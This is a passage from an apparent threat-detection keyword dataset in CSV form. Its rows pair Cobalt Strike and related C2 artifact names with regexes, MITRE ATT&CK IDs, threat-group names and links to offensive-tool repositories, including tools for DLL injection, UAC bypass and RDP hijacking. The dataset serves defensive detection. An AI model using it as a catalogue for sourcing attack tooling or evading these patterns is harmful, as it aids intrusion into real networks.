T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*beacon_elevator_register*",".{0,1000}beacon_elevator_register.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_elevators*",".{0,1000}beacon_elevators.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_elevators*",".{0,1000}beacon_elevators.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_endpoint*c2Get*",".{0,1000}beacon_endpoint.{0,1000}c2Get.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","0","N/A","10","10","64","16","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" "*beacon_endpoint*c2Post*",".{0,1000}beacon_endpoint.{0,1000}c2Post.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","0","N/A","10","10","64","16","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" "*beacon_execute_job*",".{0,1000}beacon_execute_job.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_exploit_describe*",".{0,1000}beacon_exploit_describe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_exploit_register*",".{0,1000}beacon_exploit_register.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","175","28","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" "*beacon_funcs.c*",".{0,1000}beacon_funcs\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*beacon_funcs.h*",".{0,1000}beacon_funcs\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*beacon_funcs.x64.*",".{0,1000}beacon_funcs\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*beacon_funcs.x86.*",".{0,1000}beacon_funcs\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*beacon_generate.py*",".{0,1000}beacon_generate\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","426","68","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" "*beacon_generate.py*",".{0,1000}beacon_generate\.py.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*Beacon_GETPOST*",".{0,1000}Beacon_GETPOST.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "*beacon_host_script*",".{0,1000}beacon_host_script.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_host_script*",".{0,1000}beacon_host_script.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*beacon_inline_execute*",".{0,1000}beacon_inline_execute.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_inline_execute*",".{0,1000}beacon_inline_execute.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","517","52","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "*beacon_inline_execute*",".{0,1000}beacon_inline_execute.{0,1000}","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","144","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" "*beacon_inline_execute*",".{0,1000}beacon_inline_execute.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_inline_execute*",".{0,1000}beacon_inline_execute.{0,1000}","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","3","265","41","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" "*beacon_keys -compile geacon_sourcecode_folder*",".{0,1000}beacon_keys\s\-compile\sgeacon_sourcecode_folder.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" 